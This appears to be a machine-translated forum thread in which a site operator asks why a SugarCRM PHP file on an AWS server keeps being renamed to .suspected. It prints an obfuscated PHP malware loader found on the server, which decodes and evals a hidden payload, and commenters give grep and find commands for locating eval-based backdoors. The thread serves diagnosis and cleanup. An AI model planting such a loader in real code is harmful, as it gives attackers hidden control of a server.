自從最近4天以來,我們在生產服務器(AWS EC2實例)上面臨的特殊問題是SugarCRM的唯一問題。php文件自動重命名爲php.suspected
問題是/home/site_folder/public_html/include/MassUpdate.php文件自動重命名爲/home/site_folder/public_html/include/MassUpdate.php.suspected
這種情況2-3一天中有3-4個小時的差距。只有在特定站點出現此問題時,即使它不在同一站點的臨時副本中出現。我甚至從兩個站點檢查了該文件的代碼,這是一樣的。
我們已經谷歌搜索和發現,這種問題主要發生在Wordpress網站,它可能是因爲攻擊。但是,我們檢查了我們的服務器對抗攻擊,沒有任何攻擊。此外,服務器上沒有運行病毒/惡意軟件掃描。
我們該怎麼辦?
更新: 我們通過這個link 我們執行egrep -Rl 'function.*for.*strlen.*isset' /home/username/public_html/
,發現有與下面的示例代碼一些文件後,會發現幾件事情。
<?php
function flnftovr($hkbfqecms, $bezzmczom){$ggy = ''; for($i=0; $i < strlen($hkbfqecms); $i++){$ggy .= isset($bezzmczom[$hkbfqecms[$i]]) ? $bezzmczom[$hkbfqecms[$i]] : $hkbfqecms[$i];}
$ixo="base64_decode";return $ixo($ggy);}
$s = 'DMtncCPWxODe8uC3hgP3OuEKx3hjR5dCy56kT6kmcJdkOBqtSZ91NMP1OuC3hgP3h3hjRamkT6kmcJdkOBqtSZ91NJV'.
'0OuC0xJqvSMtKNtPXcJvt8369GZpsZpQWxOlzSMtrxCPjcJvkSZ96byjbZgtgbMtWhuCXbZlzHXCoCpCob'.'zxJd7Nultb4qthgtfNMtixo9phgCWbopsZ1X=';
$koicev = Array('1'=>'n', '0'=>'4', '3'=>'y', '2'=>'8', '5'=>'E', '4'=>'H', '7'=>'j', '6'=>'w', '9'=>'g', '8'=>'J', 'A'=>'Y', 'C'=>'V', 'B'=>'3', 'E'=>'x', 'D'=>'Q', 'G'=>'M', 'F'=>'i', 'I'=>'P', 'H'=>'U', 'K'=>'v', 'J'=>'W', 'M'=>'G', 'L'=>'L', 'O'=>'X', 'N'=>'b', 'Q'=>'B', 'P'=>'9', 'S'=>'d', 'R'=>'I', 'U'=>'r', 'T'=>'O', 'W'=>'z', 'V'=>'F', 'Y'=>'q', 'X'=>'0', 'Z'=>'C', 'a'=>'D', 'c'=>'a', 'b'=>'K', 'e'=>'o', 'd'=>'5', 'g'=>'m', 'f'=>'h', 'i'=>'6', 'h'=>'c', 'k'=>'p', 'j'=>'s', 'm'=>'A', 'l'=>'R', 'o'=>'S', 'n'=>'u', 'q'=>'N', 'p'=>'k', 's'=>'7', 'r'=>'t', 'u'=>'2', 't'=>'l', 'w'=>'e', 'v'=>'1', 'y'=>'T', 'x'=>'Z', 'z'=>'f');
eval(flnftovr($s, $koicev));?>
似乎有些惡意軟件,我們如何去除它永久?
感謝
可能會有一些cron函數幹這個。 –
不,沒有這樣的cron運行。 –
如果這是一個生產應用程序,我建議您立即聯繫安全專家。你能否檢查你的Web服務器日誌,在其名稱改變之前立即看到對該文件的奇怪請求? 你可以嘗試從CLI查找運行這個。 -name「* .php」-exec grep -H「eval(」{} \;'從public_html/level。這將搜索所有可能由黑客創建的調用'eval'的php文件。可能會發現一些誤報 –